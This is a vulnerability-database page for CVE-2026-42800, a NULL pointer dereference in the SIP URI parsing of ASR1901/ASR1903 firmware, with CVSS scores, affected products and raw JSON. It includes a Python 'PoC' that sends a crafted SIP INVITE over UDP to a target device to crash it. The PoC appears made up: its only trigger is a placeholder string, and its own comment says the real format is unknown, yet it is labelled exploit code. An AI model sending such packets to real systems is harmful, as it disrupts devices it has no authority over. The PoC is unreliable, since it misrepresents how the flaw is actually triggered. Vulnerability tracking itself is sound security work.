Security Vulnerability Report
中文
CVE-2026-42800 CVSS 7.4 HIGH

CVE-2026-42800

Published: 2026-04-30 10:16:02
Last Modified: 2026-05-05 02:54:21
Source: 68630edc-a58c-4cbd-9b01-0e130455c8ae

Description

NULL pointer dereference vulnerability in ASR1903 in ASR Lapwing_Linux on Linux (ims_client modules) allows Pointer Manipulation. This vulnerability is associated with program files sip/utils/src/sipuri.c.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:asrmicro:asr1901_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:asrmicro:asr1901:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:asrmicro:asr1903_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:asrmicro:asr1903:-:*:*:*:*:*:*:* - NOT VULNERABLE
ASR Lapwing_Linux (ASR1903)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # PoC for CVE-2026-42800: NULL Pointer Dereference in sipuri.c # This script sends a malformed SIP packet to trigger the vulnerability. def send_exploit(target_ip, target_port): # Malformed SIP URI designed to trigger NULL pointer dereference # The specific format depends on the parsing logic in sip/utils/src/sipuri.c malformed_packet = ( b"INVITE sip:NULL_PTR_TRIGGER@" + target_ip.encode() + b" SIP/2.0\r\n" b"Via: SIP/2.0/UDP 192.168.1.100:5060\r\n" b"Max-Forwards: 70\r\n" b"To: <sip:NULL_PTR_TRIGGER@" + target_ip.encode() + b">\r\n" b"From: <sip:[email protected]>;tag=12345\r\n" b"Call-ID: 123456789@" + target_ip.encode() + b"\r\n" b"CSeq: 1 INVITE\r\n" b"Contact: <sip:[email protected]>\r\n" b"Content-Length: 0\r\n\r\n" ) try: print(f"[*] Sending exploit packet to {target_ip}:{target_port}") sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(malformed_packet, (target_ip, target_port)) print("[+] Packet sent successfully. Check target for crash.") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == "__main__": # Replace with actual target IP and Port TARGET_IP = "192.168.1.1" TARGET_PORT = 5060 send_exploit(TARGET_IP, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42800", "sourceIdentifier": "68630edc-a58c-4cbd-9b01-0e130455c8ae", "published": "2026-04-30T10:16:02.203", "lastModified": "2026-05-05T02:54:21.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NULL pointer dereference vulnerability in ASR1903 in ASR Lapwing_Linux on Linux (ims_client modules) allows Pointer Manipulation.\n\n This vulnerability is associated with program files sip/utils/src/sipuri.c."}], "metrics": {"cvssMetricV31": [{"source": "68630edc-a58c-4cbd-9b01-0e130455c8ae", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 3.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "68630edc-a58c-4cbd-9b01-0e130455c8ae", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:asrmicro:asr1901_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.225.003", "matchCriteriaId": "A8F18E9B-21A2-4A68-BE60-335150C4461A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:asrmicro:asr1901:-:*:*:*:*:*:*:*", "matchCriteriaId": "A4D3C8A7-2C61-4D2C-9BA9-381BE1D3FF51"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:asrmicro:asr1903_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.225.003", "matchCriteriaId": "8A740613-BAF0-4C91-865E-B9D2E60DBD67"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:asrmicro:asr1903:-:*:*:*:*:*:*:*", "matchCriteriaId": "1A8414CE-17FC-4F24-8434-4D4B80954624"}]}]}], "references": [{"url": "https://www.asrmicro.com/en/goods/psirt?cid=44", "source": "68630edc-a58c-4cbd-9b01-0e130455c8ae", "tags": ["Vendor Advisory"]}]}}